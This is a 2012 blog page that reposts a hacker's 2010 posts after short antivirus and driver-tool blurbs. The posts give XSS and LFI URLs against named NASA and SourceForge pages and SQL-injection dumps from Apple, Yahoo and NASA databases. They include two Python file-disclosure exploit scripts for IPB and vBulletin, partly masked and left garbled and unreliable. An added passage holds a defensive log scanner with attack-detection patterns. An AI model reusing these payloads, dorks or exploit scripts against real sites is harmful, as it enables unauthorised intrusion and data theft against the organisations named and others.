Sunday, February 5, 2012

Kaspersky Mobile Security



Features
  • Protects Privacy - for your eyes only
  • Locates a lost or stolen smartphone
  • Secures contacts, photos and files from unauthorized access
  • Blocks unwanted calls or SMSs
  • Has Parental control
  • Protects your smartphone from malware and network attacks

Avast Free Antivirus 6


Download Avast Free Antivirus 6 

The latest version of avast! antivirus kernel features outstanding detection abilities, together with high performance. You can expect 100% detection of In-the-Wild viruses (viruses already spreading between users) and excellent detection of Trojan horses.
The avast! engine also features outstanding unpacking support. It can scan inside the following archives: ARJ, ZIP, MIME (+ all associated formats), MAPI (Outlook pst files), DBX (Outlook Express archives), RAR, TAR, GZIP, CAB, BZIP2, ZOO, ACE, ARC, LHA/LHX, TNEF (winmail.dat), CPIO, CHM, RPM, ISO, 7ZIP and SIS. It also supports a number of executable packers (such as PKLite, Diet, UPX, ASPack, PeShield, FSG, MEW etc.).
Resident protection (the real-time protection of the operating system) is one of the most important parts of an antivirus program today. avast! features a powerful resident module that is able to detect a virus before it has any chance to infect your computer. avast! Home Edition contains resident protection of the computer file system and a resident module for e-mails and news.
Avast features a module for the protection of IM (Instant Messaging, "chat") programs, and a module for the protection of P2P (peer-to-peer) programs. The list of supported IM and P2P programs is extensive with more than 30 programs currently supported.




3DP Chip and 3DP Net

Download 3DP Chip

Ever had painful headaches searching through the web trying to find the correct drivers for your newly formatted PC?
3DP Chip and 3DP Net are extremely useful freeware tools that will minimize the effort and time you spend finding the drivers for your PC components!
3DP Net can automatically install the right network driver for your PC even if you have reinstalled Windows and cannot connect to the internet because the appropriate driver is missing. 3DP Net detects which network adapter is installed on your PC and automatically chooses the right driver from its integrated Ethernet card driver pool, so you can get online with ease.
3DP Chip is another useful program that automatically detects and displays information on the CPU, motherboard, video card and sound card installed on your PC. You can also copy this information to your clipboard with one click for later use (such as posting in a forum). If you have a working internet connection, you can choose to download the latest drivers for all of these components.
We recommend that you run 3DP Net first after reinstalling Windows to detect the network adapter and install its driver; then, once you have an internet connection, run 3DP Chip for the other component drivers.


TinKode-How to find XSS in NASA


How to find XSS in NASA

Posted by isrtinkode on February 16, 2010
__   __ _____ _____   _   _           _____
\ \ / // ____/ ____| | \ | |   /\    / ____|  /\
 \ V /| (___| (___   |  \| |  /  \  | (___   /  \
  > <  \___ \\___ \  | . ` | / /\ \  \___ \ / /\ \
 / . \ ____) |___) | | |\  |/ ____ \ ____) / ____ \
/_/ \_\_____/_____/  |_| \_/_/    \_\_____/_/    \_\
#How to find XSS in NASA?
Very simple. What you have to do is only to type on Google, inurl:”tinkode”, and that’s all.
Link google:
http://www.google.ro/search?hl=ro&client=firefox-a&rls=org.mozilla:en-US:official&hs=6Pn&q=*********&start=40&sa=N
Link Nasa XSS:
http://winds.jpl.nasa.gov/imagesAnim/images.cfm?pageName=ImagesAnim&subPageName=QuikSCAT&Image=QS_S1B28872%22%*********TinKode/%29%3C/script%3E
Yeah, this XSS is indexed on google, LOL.
Another XSS in NASA:
1. http://uavsar.jpl.nasa.gov/cgi-bin/data.pl?itext=1%22%3E%3*********/script%3E
2. http://hitf.jsc.nasa.gov/hitfpub/redirect.cfm?location=1%3C*********%29%3C/script%3E
3. http://sbir.gsfc.nasa.gov/sbirweb/search/searchResults.jsp?st=%*********/c0de.breaker/)%3C/script%3E
4. http://nmp.jpl.nasa.gov/ds2/search/search.pl?Range=All&Format=Standard&Terms=*********)%3C/script%3E
5. http://pims.grc.nasa.gov/calendars/qs_roadmap_index.php?year=*********)%3C/script%3E
6. http://starbeam.jpl.nasa.gov/tools/text-search/results.jsp?query=*********)%3C/script%3E
etc

TinKode-SourceForge LFI


SourceForge LFI

Posted by isrtinkode on February 18, 2010
 ____                            __
/ ___|  ___  _   _ _ __ ___ ___ / _| ___  _ __ __ _  ___
\___ \ / _ \| | | | '__/ __/ _ \ |_ / _ \| '__/ _` |/ _ \
 ___) | (_) | |_| | | | (_|  __/  _| (_) | | | (_| |  __/
|____/ \___/ \__,_|_|  \___\___|_|  \___/|_|  \__, |\___|
                                              |___/
Link: Sourceforge.net
Yeah, it’s vulnerable to LFI (Local File Inclusion).
http://in-dtsc.sourceforge.net/index.php?content=**********
http://in-dtsc.sourceforge.net/index.php?content=*******/conf/htt***.conf
For more information, read a tutorial about LFI.
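
The two posts above show script markup and file paths arriving in query-string parameters. A log-side check for both patterns follows, as an added example that is not part of the original posts; the log lines, paths, parameter values, rule names and function names are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed access-log lines: hosts, paths and values are made up for this example.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Feb/2010:10:00:01 +0000] "GET /images.cfm?pageName=ImagesAnim'
    '&Image=QS_1%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5120',
    '192.0.2.11 - - [18/Feb/2010:11:30:12 +0000] "GET /index.php'
    '?content=..%2F..%2Fconf%2Fapp.conf HTTP/1.1" 200 2048',
    # Double-encoded value: one decoding pass still leaves %3C...%3E in place.
    '192.0.2.12 - - [18/Feb/2010:11:31:40 +0000] "GET /search.pl?Range=All'
    '&Terms=%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 900',
    '192.0.2.13 - - [18/Feb/2010:11:32:05 +0000] "GET /index.php?content=news HTTP/1.1" 200 4096',
    '192.0.2.14 - - [18/Feb/2010:11:33:59 +0000] "GET /search.pl?Range=All'
    '&Format=Standard&Terms=solar+wind HTTP/1.1" 200 7000',
]

# Pulls the request target out of a Common Log Format request field.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

RULES = {
    # Script tags, inline event handlers or javascript: URLs inside a parameter value.
    "reflected-xss": re.compile(
        r"<\s*/?\s*script\b|<[^>]+\son\w+\s*=|javascript\s*:", re.I
    ),
    # A ".." path segment or a NUL byte in a value that may reach a file include.
    "path-traversal": re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)|\x00"),
}


def decode_fully(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded values are seen in clear form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line):
    """Return (path, parameter, rule) for every suspicious query parameter in a line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    target = urlsplit(match.group(1))
    hits = []
    # parse_qsl performs the first decoding pass; decode_fully handles the rest.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        clear = decode_fully(value)
        for rule, pattern in RULES.items():
            if pattern.search(clear):
                hits.append((target.path, name, rule))
    return hits


def scan(lines):
    """Scan a whole log; each finding is (line number, path, parameter, rule)."""
    findings = []
    for number, line in enumerate(lines, 1):
        for path, name, rule in scan_line(line):
            findings.append((number, path, name, rule))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print("line {}: {} parameter {!r} -> {}".format(*finding))
```

A hit is a triage signal for the named page and parameter; the fix belongs in the application, by encoding output and mapping the include parameter to a fixed allowlist of files.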

TinKode-APPLE Vulnerable to Blind SQLi


APPLE Vulnerable to Blind SQLi

Posted by isrtinkode on February 18, 2010
          _____  _____  _      ______
    /\   |  __ \|  __ \| |    |  ____|
   /  \  | |__) | |__) | |    | |__
  / /\ \ |  ___/|  ___/| |    |  __|
 / ____ \| |    | |    | |____| |____
/_/    \_\_|    |_|    |______|______|
  #BlindSQLi by TinKode
@Apple
Apple is an American multinational corporation that designs and manufactures consumer electronics and computer software products.
The company’s best-known hardware products include Macintosh computers, the iPod, and the iPhone.
Apple software includes the Mac OS X operating system, the iTunes media browser, the iLife suite of multimedia and creativity software, the iWork suite of productivity software, Final Cut Studio, a suite of professional audio and film-industry software products, and Logic Studio, a suite of audio tools.
The company operates more than 250 retail stores in nine countries, and an online store where hardware and software products are sold.
Yeah, so it’s a huge company, but it has low security. Sad.
This parameter can be found by anyone in only 5 min with google.
Testing:


Now let’s see the version
#Version: 5
#Databases: locator_asia, test
#Tables from “locator_asia” database
#Tables from “test” database
[0]: StoreRedir
[1]: downloadqueue
[2]: iwork
[3]: qtcomp
Columns from “reseller_city_utf8” table
A good thing is that there is nothing important to extract…
Great, good bye, TinKode

TinKode-Yahoo Blind SQL Injection


Yahoo Blind SQL Injection

Posted by isrtinkode on February 18, 2010
__     __   _                   ____  _ _           _    _____  ____  _      _
\ \   / /  | |                 |  _ \| (_)         | |  / ____|/ __ \| |    (_)
 \ \_/ /_ _| |__   ___   ___   | |_) | |_ _ __   __| | | (___ | |  | | |     _
  \   / _` | '_ \ / _ \ / _ \  |  _ <| | | '_ \ / _` |  \___ \| |  | | |    | |
   | | (_| | | | | (_) | (_) | | |_) | | | | | | (_| |  ____) | |__| | |____| |
   |_|\__,_|_| |_|\___/ \___/  |____/|_|_|_| |_|\__,_| |_____/ \___\_\______|_|

                                            #By c0de.breaker@Romania
Yahoo! Inc. is an American public corporation headquartered in Sunnyvale, California, (in Silicon Valley), that provides Internet services worldwide. The company is perhaps best known for its web portal, search engine (Yahoo! Search), Yahoo! Directory, Yahoo! Mail, Yahoo! News, advertising, online mapping (Yahoo! Maps), video sharing (Yahoo! Video), and social media websites and services.
According to Web traffic analysis companies (including Compete.com, comScore, Alexa Internet, Netcraft, and Nielsen Ratings), the domain yahoo.com attracted at least 1.575 billion visitors annually by 2008. The global network of Yahoo! websites receives 3.4 billion page views per day on average as of October 2007. It is the second most visited website in the world in May 2009.
Vulnerable website: http://hk.adspecs.yahoo.com
Testing…


In this picture we can see that SELECT works
Now we try to find the version:
#Version: 5.0.11.24
Ok, it’s normal until now, but we can have access to mysql.user (bad)
And some tables from mysql.user (default)
MySQL Database, Table: user
#user
#password
~TinKode

TinKode-IPB Full Disclosure Exploit [Python]


IPB Full Disclosure Exploit [Python]

Posted by isrtinkode on February 19, 2010
#! /usr/bin/env python3.1

################################################################
#           _____ _____  ____  (validator.php)            #
#         |_   _|  __ \|  _ \                            #
#    | | | |__) | |_) |                           #
#     | | |  ___/|  _ <                            #
#     _| |_| |    | |_) |                           #
#     |_____|_|    |____/                            #
#                                   @expl0it...                #
################################################################
#          [ IPB Files / Directories Full Disclosure ]         #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                 Special thanks for: cmiN                     #
#                 www.TinKode.BayWords.com                     #
################################################################
 
 
import os, sys, urllib.request, urllib.parse, threading 
 
 
def main(): 
    logo = """ 
\t |---------------------------------------------------------------| 
\t |                      _____ _____  ____    (TM)                | 
\t |                     |_   _|  __ \|  _ \                       | 
\t |                       | | | |__) | |_) |                      | 
\t |                       | | |  ___/|  _ <                       | 
\t |                      _| |_| |    | |_) |                      | 
\t |                     |_____|_|    |____/                       | 
\t |                                                               | 
\t |                                                               | 
\t |                  IPB Full Disclosure expl0it                  | 
\t |                      Written by cmiN                          | 
\t |              Vulnerability discovered by TinKode              | 
\t |                                                               | 
\t |                                                               | 
\t |         Visit: www.insecurity.ro & www.darkc0de.com           | 
\t |---------------------------------------------------------------| 
""" 
    usage = """ 
         |---------------------------------------------------------------| 
         |Usage:  ipbfd.py scan http://www.site.com/IPB_folder           | 
         |        ipbfd.py download *.zip -> all                         | 
         |        ipbfd.py download name.jpg -> one                      | 
         |---------------------------------------------------------------|""" 
    if sys.platform in ("linux", "linux2"): 
        clearing = "clear" 
    else: 
        clearing = "cls" 
    os.system(clearing) 
    print(logo) 
    args = sys.argv 
    if len(********) == 3: 
        try: 
            print("Please wait...") 
            if args[1] == "********": 
                extract_parse_save(********)) 
            elif args[1] == "********": 
                download_data(********]) 
        except Exception as message: 
            print("An error occurred: ********)) 
        except: 
            print("Unknown error.") 
        else: 
            print(********") 
    else: 
        print(usage) 
    input() 
 
 
def extract_parse_save(url): 
    print("[+]Extracting content...") 
    hurl = url + "/validator.php" 
    with ********.********) as usock: 
        source = usock.read().decode() 
    print("[+]Finding token...") 
    word = "validate('" 
    index = source.find(word) 
    if index != -1: 
        source = source[********):] 
        value = source[:source.index(********)] 
        hurl = url ********.format(********) 
    else: 
        print("[!]Token not found.") 
    print("[+]********...") 
    with urllib.request.******** as usock: 
        lastk, lastv = None, None 
        dictionary = dict() 
        for line in usock: 
            line = line.decode() 
            index = line.find(********) 
            if index != -1: 
                lastk = line[index + ********" ").strip(********) 
            index = line.find(********") 
            if index != -1: 
                lastv = line[index + ********:line.index("********")].********(" ") 
            if lastk != None and lastv != None: 
                index = ********") 
                if index in (********, 0): 
                    lastk = "[other] {}".format(lastk) 
                else: 
                    lastk = "[********}".format(********) 
                dictionary[********astv 
                ******** = None, None 
    print("[+]Organizing and saving paths...") 
    with open("********", "********") as fout: 
        fout.write(********) 
        keys = sorted(********) 
        for key in keys: 
            fout.write(********)) 
 
 
def download_data(files): 
    print("[+]Searching ********...") 
    mthreads = ******** 
    with open(********) as fin: 
        url = fin.readline()********) 
        if files.find("*") == -1: 
            hurl = ********) 
            Download(hurl).start() 
        else: 
            ext = files[files.********] 
            for line in fin: 
                pieces = l********) 
                if pieces[0].count(ext) == 1: 
                    upath = pieces[1] 
                    hurl = ********) 
                    while threading.active********reads: 
                        pass 
                    Download(********) 
    while threading.active_count(******** 
        pass 
 
 
class Download(********): 
 
    def __********): 
        threading.Thread.********) 
        ******** = url 
 
    def run(self): 
        try: 
            with urllib.request.urlopen(********usock: 
                data = ********) 
                uparser = urllib.parse.urlparse(********) 
                pieces = uparser.********) 
                ******** = pieces[********] 
                with open(********) as fout: 
                    fout.********) 
        except: 
            pass 
 
 
********__main__": 
    main()


You must have Python 3.1 for this to work!

TinKode-vBulletin Full Disclosure [Python]


vBulletin Full Disclosure [Python]

Posted by isrtinkode on February 19, 2010
#! /usr/bin/env python3.1
#
################################################################
#                ____        _ _      _   _ (validator.php)    #
#               |  _ \      | | |    | | (_)                   #
#         __   _| |_) |_   _| | | ___| |_ _ _ __               #
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              #
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             #
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             #
#                                   @expl0it...                #
################################################################
#       [ vBulletin Files / Directories Full Disclosure ]      #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                  Special thanks for: cmiN                    #
#                  www.TinKode.BayWords.com                    #
################################################################
 
 
import os, sys, urllib.request, urllib.parse, threading 
 
 
def main(): 
    logo = """ 
\t |---------------------------------------------------------------| 
\t |                 ____        _ _      _   _     (TM)           | 
\t |                |  _ \      | | |    | | (_)                   | 
\t |          __   _| |_) |_   _| | | ___| |_ _ _ __               | 
\t |          \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              | 
\t |           \ V /| |_) | |_| | | |  __/ |_| | | | |             | 
\t |            \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             | 
\t |                                                               | 
\t |               vBulletin Full Disclosure expl0it               | 
\t |                      Written by cmiN                          | 
\t |              Vulnerability discovered by TinKode              | 
\t |                                                               | 
\t |              Dork: intext:"Powered by vBulletin"              | 
\t |          Visit: www.insecurity.ro & www.darkc0de.com          | 
\t |---------------------------------------------------------------| 
""" 
    usage = """ 
         |---------------------------------------------------------------| 
         |Usage:  vbfd.py scan http://www.site.com/vB_folder             | 
         |        vbfd.py download *.sql -> all                          | 
         |        vbfd.py download name.jpg -> one                       | 
         |---------------------------------------------------------------|""" 
    if sys.platform in ("linux", "linux2"): 
        clearing = "clear" 
    else: 
        clearing = "cls" 
    os.system(clearing) 
    print(logo) 
    args = sys.argv 
    if len(args) == 3: 
        try: 
            print("Please wait...") 
            if args[1] == "scan": 
                extract_parse_save(********)) 
            elif args[1] == "********": 
                download_data(********) 
        except Exception as message: 
            print("An error occurred: {}".********) 
        except: 
            print("Unknown error.") 
        else: 
            print(********) 
    else: 
        print(usage) 
    input() 
 
 
def extract_parse_save(url): 
    print("[+]********...") 
    hurl = url + "/validator.php" 
    with urllib.request.******** as usock: 
        source = ********() 
    print("[+]Finding ********") 
    word = "validate('" 
    source = source[source******** + len(word):] 
    value = ********] 
    print("[+]Obtaining paths...") 
    hurl = url + "/validator********(value) 
    with urllib.request.urlopen(hurl) as usock: 
        lastk, lastv = None, None 
        dictionary = dict() 
        for line in usock: 
            line = ********() 
            index = ********") 
            if index != -1: 
                lastk = line[index ********(" ") 
            index = line.find("********") 
            if index != -1: 
                lastv = line********) 
            if lastk != None and lastv != None: 
                index = ********) 
                if index in (-1, 0): 
                    lastk = "********) 
                else: 
                    lastk = "[{}] {}".format(********) 
                dictionary[lastk] = lastv 
                lastk, lastv = None, None 
    print("[+]Organizing and saving paths...") 
    with open(********) as fout: 
        fout.********) 
        keys = sorted(dictionary.keys()) 
        for key in keys: 
            fout.write********(key, dictionary[key])) 
 
 
def download_data(files): 
    print("[+]Searching and downloading files...") 
    ******** = 50 
    with open("********) as fin: 
        url = fin.readline(********) 
        if files.find********
            hurl = url + ********) 
            Download(hurl).start() 
        else: 
            ext = files[files.********] 
            for line in fin: 
                pieces = line********) 
                if pieces[0].******** 
                    upath = pieces[1] 
                    hurl = ********) 
                    while threading.active_********) > ******** 
                        pass 
                    Download(********).start() 
    while threading.********) > 1: 
        pass 
 
 
class Download(********): 
 
    def __init__(self, url): 
        threading.Thread.__********) 
        self.url = ******** 
 
    def run(********): 
        try: 
            with urllib.request.urlopen(self.url) as usock: 
                data = ********() 
                uparser = urllib.parse.urlparse(********) 
                pieces = ********.********) 
                fname = pieces[********] 
                with open(********) as fout: 
                    ********.write(data) 
        except: 
            pass 
 
 
********"__main__": 
    main()


You need Python 3.1 for this to work!

TinKode-NASA 2 Websites Full Access


NASA 2 Websites Full Access

Posted by isrtinkode on February 19, 2010
 _   _
| \ | | __ _ ___  __ _
|  \| |/ _` / __|/ _` |
| |\  | (_| \__ \ (_| |
|_| \_|\__,_|___/\__,_|
      #owned by c0de.breaker
I had access to:
www.istd.gsfc.nasa.gov
www.sed.gsfc.nasa.gov
Some screens:
http://i44.tinypic.com/vnjl10.png
http://i41.tinypic.com/25j9zle.png
http://i37.tinypic.com/294t26t.png
http://i35.tinypic.com/qnpf9y.png
http://i38.tinypic.com/23r5mw.png
http://i37.tinypic.com/2rfe92u.png
http://i35.tinypic.com/a57s5e.png
Information:
#Version: 5.0.41-community-nt-log
#User: **********.gsfc.nasa.gov
#Principal Database: *****
Tables from “*****” database:
#access
#branch
#docs
#docsbranch
#intro
#programs
Columns from “access” table:
Admins Accounts:
I didn’t want to damage anything, only to show that NASA subdomains have many SQLi, XSS vulnerabilities, etc.
#Finish, c0de.breaker

TinKode-NASA Full-Disclosure! AGAIN


NASA Full-Disclosure! AGAIN

Posted by isrtinkode on February 19, 2010
 _   _                      _               _
| \ | | __ _ ___  __ _     / \   __ _  __ _(_)_ __
|  \| |/ _` / __|/ _` |   / _ \ / _` |/ _` | | '_ \
| |\  | (_| \__ \ (_| |  / ___ \ (_| | (_| | | | | |
|_| \_|\__,_|___/\__,_| /_/   \_\__, |\__,_|_|_| |_|
                                |___/
              #Full Disclosure... c0de.breaker
#Important
Ok. First of all, the reason I made this SQLi public (even though I had no intention to make this), is because I found out that somebody else discovered the vulnerable parameter. I found this SQLi 3 months ago.
# Why do I test websites?
Because it is my hobby, and I want to prove that even the big websites, which should be highly secured, can be hacked. This is the reality, and it makes me sad. I feel alright about what I’m doing, because if anyone finds a vulnerability before me, he/she could use it in harmful ways such as: shelling, rooting, backdooring, deleting etc.
The WebSite Vulnerable: http://saif-1.larc.nasa.gov (CEOS Systems Analysis Database)
Testing:


Information:
#Version: 5.1.31-community
#User: *******
#Main Database: *******
#Path of MySQL: C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\
Also, magic_quotes_gpc=OFF, and “user” from mysql has all privileges:
Bad…
Other Databases:
#ceossadb
#information_schema
#mysql
#ceosvis
Tables from “ceosvis” database:
#instrument
#takes
#measurement
#contains
#mission
Tables from main Database:
I made this public because I saw the website down, and I think the administrators will fix the vulnerability once someone reports the problem. (Sorry because I didn’t make this first, if was that.)